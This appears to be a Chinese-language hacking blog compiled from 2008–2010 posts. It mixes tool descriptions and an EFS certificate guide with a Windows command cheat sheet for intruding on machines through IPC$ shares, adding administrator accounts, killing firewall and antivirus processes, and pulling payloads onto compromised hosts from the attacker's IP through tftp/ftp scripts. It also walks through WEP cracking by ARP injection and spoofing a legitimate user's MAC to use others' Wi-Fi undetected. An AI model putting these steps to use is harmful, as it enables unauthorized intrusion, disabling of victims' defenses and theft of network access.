2010年04月28日

一、国产经典软件简介

先介绍些在国产黑客业内有举足轻重的作用的老软件。

溯雪

密 码探测器:利用溯雪可以轻松的完成基于web形式的各种密码猜测工作,例如email、forum中的注册用户密码等。软件采取多线程编写,除了支持字典 和穷举以外,软件最大的特色是可以自己编写猜测规则,例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文件,最大程度上保证了猜测的准确性。

乱刀

密码破解:乱刀可以破解unix系统中的密码暗文,对于取得了etc/passwd文件的黑客来说这是必不可少的。

天网

防 火墙软件:中国第一套通过公安部认证的软硬件集成防火墙,能有效的防止黑客入侵,抵御来自外部网络的攻击,保证内部系统的资料不被盗取,它根据系统管理者 设定的安全规则把守企业网络,提供强大的访问控制、身份认证、应用选通、网络地址转换、信息过滤、虚拟专网、流量控制、虚拟网桥等功能。

冰河

木 马类软件:国内响当当的木马软件,知名度绝不亚于BO,主要用于远程监控。自动跟踪屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文 件及注册表、远程关机、发送信息等多种监控功能。此软件的一大特色是可以由使用者自己设置需要占用的端口,如此一来监控类软件就很难从端口号上直接判断系 统是否存在冰河了。

小分析家

监测类软件:免费网络协议分析工具,这个工具的特点是界面简单实用,与国外的一些sniffer产品相比,如Netxray,结果更为直观。此软件为免费版本,只能运行在NT系统下,同时编写此软件的公司还提供了软件的商业版本“网警”。

快速搜索

端口扫描器:快速搜索是一个在网络上搜索服务器的软件,可以根据给定的地址和端口号查找机器。具有多线程同时搜索技术,可以将搜索速度提高到单线程的十倍以上。

其他:针对2000/XP扫描的D-TOOLS等。

二、常见网络安全软件简介

Local Port Scanner

本地端口扫描器:通过这个软件可以监测本地电脑被打开的端口。此软件可以监测大多数黑客入侵或者木马占用的端口,它有五种不同的扫描方式并可以获得有关端口的详细扫描信息。

A-spy

系 统进程察看器:A-spy可以监测Windows系统启动过程中调用的所有程序、执行的进程,并将结果保存在日志文件中。这个软件的用途是检察系统是否被 安置了木马程序,同时软件还可以对系统启动需要调用的程序进行增加、删除和编辑等操作,改变调用程序之间的先后顺序,软件支持包括NT、2000在内的所 有Windows平台,具有17种方式清楚木马程序。

Netmon

图形化Netstat命令:Netmon是图形化的Netstat命令,它运行在Windows系统中,可以察看系统的TCP、UDP连接状态,同时此软件提供了一份完整的木马、蠕虫占用端口清单,可以快速了解系统是否存在安全问题。

LANguard Network Scanner

局域网资料收集器:LANguard允许使用者扫描局域网内部的搜索电脑,搜集他们的netbios信息、打开端口、共享情况和其他相关资料,这些资料及可以被黑客利用进行攻击,也可以被管理员利用进行安全维护,通过它可以强行关闭指定端口和共享目录。

Leechsoft’s NetMonitor

TCP/IP状态分析程序:这个软件使用于系统安全管理员、网络程序开发员、一般的拥护。此工具可以显示电脑在上网状态下存在的TCP/IP连接,同时还能分析是否有其他人正在监视上网者电脑中的某个端口,同时此工具内部还有一个功能强大的端口扫描程序。

Win Trinoo Server Sniper

清 除Win.Trinoo Server程序:Win.Trinoo是一个类似DOS攻击的木马程序,被植入它的电脑将变成一台Win.Trinoo Server,黑客通过这个Server能够“借刀杀人”攻击其他电脑系统。Win Trinoo Server Sniper可以高速的监测电脑是否存在此问题。

SubSeven Server Sniper

清 除SubSeven Server程序:同上面的工具一样,SubSeven也是一个木马程序,而SubSeven Server Sniper则是用来检测并清除SubSeven而设计的。不同的是,这个软件不但可以清楚SubSeven,而且还能搜集攻击者在您电脑中留下的蛛丝马 迹,找到攻击者的ICQ号码、email地址等内容,从而为反跟踪提供了详尽的信息。

Attacker

端口监听程序:这是一个TCP/UDP端口监听程序,它可以常驻系统并在危险端口打开的时候发出警告信息,保证个人上网隐私的安全性。

ICEWatch

BlackICE插件:这个插件可以完善BlackICE的结果列表,让列表更加详尽,同时该插件还提供了更好的结果分类查询功能,并且可以对结果进行复制、编辑等操作。另外此插件为BlackICE提供了声音,可以设置软件使用过程中的提醒、警告的音效。

Isecure IP Scanner

netbios共享扫描器:黑客利用netbios的共享可以进入存在问题的电脑并对硬盘进行操作,同时还可以获得入侵电脑上的隐私资料。这个扫描器就是专门为防止此类事件发生开发的,运行软件会自动扫描目标并报告有关资料。

AnalogX Port Blocker

端 口屏蔽程序:当使用者的电脑上开放某个端口的时候,任何人都可以通过其开放端口访问相应资源,而AnalogX Port Blocker可以屏蔽某个端口,或者设置特殊IP地址禁止对指定端口的请求,这从一定程度上方便了程序调试人员为在本地系统上从事软件的测试工作。

Tambu Dummy Server

端口屏蔽程序:这个工具同上面一个程序的功能是一样的,不过不同的是,这个工具是基于控制台模式,更加适合于高手。

Tambu Registry Edit

注册表修改程序:该程序可以让使用者手动修改系统注册表中的各项键值,从而改变系统的性能,同时软件中保存了网络上常见的具有破坏性程序的资料,可以迅速确定系统注册表中是否有可疑程序,并提供了清除和备份等功能

作者: Wendy

2009年03月10日
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名  开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续….
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
#3 三:

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四:

IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

#5 五:

MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump –opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
一.对用户操作
net user 查看有哪些用户
net user guest /active:yes 激活guest用户
net user 用户名 密码 /add 建立用户
net localgroup administrators 用户名 /add 把“用户”添加到管理员中
使其具有管理员权限

net start —–查看开启了哪些服务
net start 服务名—–开启服务
net stop 服务名——停止某服务
netstat -an :查看端口的网络连接情况
ipconfig :查看本地ip地址

net stop sharedaccess —-关系统自带防火墙
pskill.exe ravmon —–杀掉瑞星软件
pskill.exe pfw —-关天网防火墙
net stop "Symantec AntiVirus"—-关于诺顿企业版
net stop KAVStart——关闭金山杀毒

向肉鸡上传文件命令:
第一种方法:tftp
命令格式:tftp -i 你的公网IP get xx.exe
第二种方法:ftp
命令格式:
echo open xxx.xxx.xxx.xxx>c:\520hack.txt
echo user>>c:\520hack.txt
echo pass>>c:\520hack.txt
echo get aoqi.rar>>c:\520hack.txt
echo bye>>c:\520hack.txt
ftp -s:c:\520hack.txt
del c:\520hack.txt

第三种方法:
start http://caihuoche.h126.com (改成你的网页木马地址)

2009年02月25日

EFS(加 密文件系统)使用加密密钥对数据进行加密,加密密钥与证书绑定在一起。

      EFS(加密文件系统)使用加密密钥对数据进行加密,加密密钥与证书绑定在一起。在Windows XP中,首次加密计算机上的文件/文件夹后,Windows XP将会自动为用户生成EFS证书,该证书与加密密钥相关联,EFS 使用该密钥来加密和解密数据。

    需要再次强调的是,对EFS而言,其加密密钥始终链接到一个特定的加密证书,而一旦加密密钥受损比如说意外删除时,加密数据将无法读取,因此,为保护您的数据,在加密文件/文件夹后,要注意将加密证书备份。

     而当我们加密了某个文件后,该文件便只能被我们读取、操作,其他用户无法将其打开。那么,如果需要将加密文件共享,应该怎么办?是不是必须要将文件解密以未加密的方式才能共享呢?

当然不必。

当要共享加密文件时,我们所要做的只是将待共享该文件的用户的加密证书添加到该文件中。而要实现这一点,需要首先取得对方的加密证书,因此,在讨论如何共享加密文件前,本节先来谈谈EFS证书的导出与导入。

EFS(加密文件系统)证书的导出

要实现文件的共享,首先需要加密文件的证书与密钥,这也即是说,要进入加密证书的导出过程。

1.在开始菜单搜索框中输入“CertMgr.msc”,打开“证书管理器”。这是一个触发UAC的操作,需要用户输入输入管理员密码或进行确认。

2.单击“个人”文件夹旁边的箭头将其展开,然后单击要导出的EFS 证书。

3.单击“操作”菜单,指向“所有任务”,然后单击“导出”。

4.在证书导出向导中,单击“下一步”。

5.单击“是,导出私钥”,然后单击“下一步”。

6.在“导出文件格式”页面上,选择“个人信息交换”,单击“下一步”。

7.键入要使用的密码,确认该密码,然后单击“下一步”。

8.导出过程将创建一个存储证书的文件。键入该文件的名称和位置(包括完整路径)。

9.单击“完成”。

EFS(加密文件系统)证书的导入  

当获得 EFS 加密证书后,需要将该证书导入。

1.在开始菜单搜索框中输入“CertMgr.msc”,打开“证书管理器”。这是一个触发UAC的操作,需要用户输入输入管理员密码或进行确认。

2.选择“个人”文件夹。

3.单击“操作”菜单,指向“所有任务”,然后单击“导入”。

4.在证书导入向导中,单击“下一步”。

5.键入包含该证书的文件的位置,或者单击“浏览”,导航至该文件的位置,然后单击“下一步”。

6.输入该证书的密码,选中“标记此密钥为可导出的”复选框,然后单击“下一步”。

7.单击“将所有的证书放入下列存储区”,选择“个人”,然后单击“下一步”。

2009年02月21日

本教程,目的是让大家可以了解破解无线网络的方式,从而加强自己的网络安全性。请不要用于非法目的。
另外,在互联网上,有太多的方法知道你是谁,不要以为用别人的AP就没人找得到你哦。

这里是一个较为详细的BT3  Backtrack 3 破解无线网WEP的一个教程。

首先
http://wiki.remote-exploit.org/index.php/HCL:Laptops
到这个地方确认你的笔记本电脑可以做这个事情。
基本新一点的都是兼容的。

其次,到这里确认你的无线网卡兼容
http://wiki.remote-exploit.org/index.php/HCL:Wireless

补充:
显卡兼容性是最大的问题,IBM X61这种Intel内置显卡是不支持的.
如果你启动不了图形界面,哪么考虑下面两个补丁:
ATI的驱动在这里:
http://wiki.remote-exploit.org/index.php/Modules
Navida的驱动在这里
http://www.offensive-security.com/modules/nvidia.lzm
将下载的模块copy到 x:\BT3\modules 文件夹里即可

然后开始下载你需要的BT3版本:
http://wiki.remote-exploit.org/index.php/Main_Page

个人建议:
如果随便玩玩,或者是台式机,可以下载CD版的那个,因为启动一次时间不短。
如果是笔记本,硬盘又大,可以下载 USB版的那个。
USB版:
http://www.remote-exploit.org/bt3b141207.rar.torrent
http://backtrack.mjdupree.com/bt3b141207.rar
ftp://bt3.aircrack-ng.org/bt3b141207.rar

下载完以后,可以装到一个可以启动的U盘里面,或者直接扔到硬盘上,后面我会说如何用硬盘直接启动这个东西。

—————–如何变成启动盘——————–

光盘版的,刻录完就好了,不提了。

USB版的, 随便解压缩到某个U盘的根目录,这样,根目录下有 BT3和Boot两个文件夹。
打开一个DOS窗口, 指向你的U盘目录,比如是H盘,那么
———运行———
H:  +回车
cd boot
bootinst.bat

按提示,确认你的确是在你的U盘的目录下操作。然后OK了。

重启时插入U盘即可启动,如果有任何问题,请确认你的电脑打开了U盘启动,并且被放在第一启动项(ThinkPad可以指定排除某个启动项的,请检查)
或者在启动时按住F12, 选择 U盘启动。

如果是硬盘启动,虽然有很多办法,但是为了VISTA和XP的兼容,个人推荐 DOS启动法,即先弄一个DOS的启动,比如弄一个MouseDOS一类的,傻瓜安装,可以让电脑启动进入纯DOS状态,然后在DOS情况下,进入 硬盘上解压出的那个Boot目录里面,里面有个DOS 目录,然后执行BT3.bat 即可。
建议在执行BT3.bat前,先运行一下 Smartdrv.exe ,可以加快启动速度很多。(附件里有 Smartdrv.exe 98版)
小提示:DOS下的启动,不会自动进入图形界面,可以通过编辑 DOS目录里面的 CONFIG文件来实现:
只需要在CONFIG里面,最后加上一句:
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件,直接加上:
smartdrv.exe
D:
cd boot
cd dos
bt3.bat

这样启动直接进入了图形界面。
这时候的BT3,是全部在内存里的,也就是说,在系统内,任何对桌面和配置的改动都不会被记录,所以如果要记录文档,请不要放在桌面上。

看到有坛友说蹭网被抓心里还是有些小怕怕,呵呵,以后上网可别太狂了,其实大家也可以采用一些小小的技术手段来躲避一些中菜鸟级别的主人或网管。方法其实很多牛人都提过,本人只是进行整理了一下,并加了一些自己的经验,不能算是原创,呵呵。先放出一些,后续的再发。
1、将自身伪装成合法用户
首先要破解掉这个AP的密码,然后要记下如下信息以备用。(假设A为合法用户)
1)A的合法MAC地址 2)对方的SSID名称,通过对SSID名称的猜测来判断其默认的IP段和网关地址(一般用户不会更改)
记录以上信息后通过SMAC工具来将自己的MAC地址改成A的MAC地址,进行连接。有以下几种情况:
一、如果对方开启了DHCP,信号好的话,恭喜你!你肯定可以得到有效的IP地址和网关信息,记住如果此时A也在线的话,那么你将得到和A一模一样的IP地址,此时请你不要急于上网,请把你的机器名修改掉,并开启自己的防火墙。防止被别人发现,这个是有必要的。不要上QQ和论坛等一切带有个人信息的软件和网页。这个很重要!!
二、对方关闭了DHCP,启用地址绑定,那么你请按以下操作。以使用一些局域网扫描工具,这里推荐 “科来安全扫描工具技术交流版”的 ,将你的IP地址手动设置为27.122.1.100 子网掩码设为 255.0.0.0,网关和 DNS 空着,然后开启扫描,不出一会儿你就可以看到右面的列表中有在线的用户地址,请把你得到的A地址与这里的地址核对一下,就可以找到A的合法IP地址,和网关信息。至于DNS,你可以填入208.67.222.222 2.8.67.220.220这个是OPENDNS的官方DNS,可以访问很多平时你不能访问的网页哟。(呵呵,别干坏事)
经过上面的操作,此时你已经是一个合法的用户了,不过请低调,请把自己的主机名尽量修改和对方一样,这样不容易察觉,请开启防火墙防止对方扫描,请不要上带有真实个人信息的软件和网页。QQ尽量少开,因为它的协议随便用一个协议分析软件就能看到你的聊天记录。
顺便帮一些朋友解除一些疑问:
1、我将自己修改成对方合法的MAC地址后会不会有什么提示或对方断线或掉包什么的?
 
答:对方不会有任何提示,如果对方有ARP防火墙可能会提示有ARP攻击。断线是不会的,掉包是少不了的!!所以请大家文明蹭网(蹭网本身就不文明,嘿 嘿)
2、如果对方开启扫描会得到哪些数据?
 呵呵,恭喜你一个,对方扫描的话得到的可能是一个无用的数据,呵呵,为什么呢,因为你的MAC地址和A一样,这样扫描得到信息是在你们俩机器名之间随机选择,可能是他自己可能是你!这就是为什么要你把你的机器名修改尽可能的相似了,这样一眼还看不出,呵呵
3、为什么尽量少开带有个人信息的软件和网页
 这是因为如果对方发现有些不对劲了,他可能会进行扫描,一般的软件与LANSEE或LANHELP这些小工具虽然不能发现问题,但是如果采用像“ 科来网络分析系统”或其他一些企业级的网络扫描工具,那么你的上网记录就会显示无余了!
4、如何让自己隐藏更深?
 请更新你的系统补丁到最新,防止有漏洞被利用。同时开启防火墙,关闭默认共享,关闭多余端口,关闭GUEST用户,机器名和用户名请尽量采用大众化的名称,最好是GHOST电脑公司版的名字(不是推荐你用这个版本的系统),关机时请把MAC地址还原并清空系统记录,最好是采用光盘版系统,呵呵
5. 还有个更有效的方法,别人找到你的数据都加密了,就算抓到数据包也没用?————补充ZERO
 找个VPN程序,拨号出去好再开启你的个人程序上网、上Q、上其他什么的,这样的你所有数据都是通过VPN转出去,大家都知道VPN会对所有数据都加密的,介绍个好的软件,我也一直在用,拨号都是到美国的。“Hotspot Shield ”。
2009年02月18日
俺是刚学web破解的超级菜鸟。感谢这里的DX们的无私奉献,让俺学到了很多东西。之前已学会用Back Track 2 光盘进行web破解。现尝试用wifiway的live CD来做同样的事。 
 
启动光盘:wifiway 0.8 (下载:http://www.wifiway.org/principal/descargas.html)
笔记本无线网卡:intel 3945 abg
 
破解步骤:
1.  用wifiway 0.8光盘启动计算机。
2.  一路回车,直至 “wifiway:~#”出现。
3.  输入:startx  (回车)
4.  等待进入Xwindows界面
5.  Xwindows界面下,点击左下角图标“Terminal Emulador de terminal”
6.  在出现的“Terminal”窗口里输入: airoway.sh   (回车)
 
以下仅供没有破解WEB经验的菜鸟参考,会用Back Track 2 光盘破解WEB的DX们不看也知道如何操作了。 :)
7.  出现5个“Airoway_XX”窗口
8.  确保屏幕最左上角那个“Airoway_Command_…”窗口为当前窗口。
9.  分别按“1”至“9”、“a”至“e”,在右上角的“Airoway_Scan…”窗口里会显示各频道里扫描到的AP。
10.              选择需要破解的AP,以下以频道6里的一个AP为例
11.              点击屏幕最左上角那个“Airoway_Command_…”窗口,并按“6”
12.              回车,按 “2” (“2”对应需要破解的AP)
13.              察看右下角 “Airoway_Attack…” 窗口,如果顺利,第二行会显示:
15:29:59  Injection is working!  (意思是ARP 注入攻击可行。) 如果显示的是 : No answer  则无法进行ARP 注入攻击。只能等待那个AP的Client 上网时产生大流量数据,收集到足够的IVS,才能进行破解。
14.              在屏幕最左上角那个“Airoway_Command_…”窗口,按“2” ,即选择 “Associate (….)”。意思是以本机的无线网卡联系那个AP。“Airoway_Command_…”窗口下方的 “Airoway_Attack”窗口,如果显示:(最后一行)Association Successful :-) 则表示顺利完成连接。
15.              “Airoway_Command_…”窗口里,按“3”,即选择“Replay live ARPS ….”意思是对被破解AP进行ARP注入攻击,以产生大量的IVS。
16.              如果顺利的话,等待几分钟,就能开始ARP注入攻击。
17.              屏幕最左下角的窗口里,可以看到迅速滚动增加的类似(got 34567 ARP requests)信息。屏幕右上角“Airoway_Attack…” 窗口里,“# Data”和 “Packets”的数值在快速增加。
18.              等待“# Data”的数值达到20万或30万,在“Airoway_Command_…”窗口里,按“8”,进行Key的破解。顺利的话,十几秒到几分钟内,Key就会显示在最右下角的窗口里。
 
至此,完成破解。
2009年01月09日

  说起Wireshark就不得不提Ethereal了,Ethereal和在Windows系统中常用的sniffer pro并称网络嗅探工具双雄,不过和sniffer pro不同的是Ethereal在Linux类系统中应用更为广泛。而Wireshark软件则是Ethereal的后续版本,他是在Ethereal被收购后推出的最新网络嗅探软件,在功能上比前身更加强大。

  Wireshark是功能强大的网络数据捕获工具,他可以帮助我们分析网络数据流量,在第一时间发现蠕虫病毒,木马程序以及ARP欺骗等问题的根源。相信各位网络管理员一经使用就会爱上他而离不开他

  官方:http://www.wireshark.org/

2008年12月22日

对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:

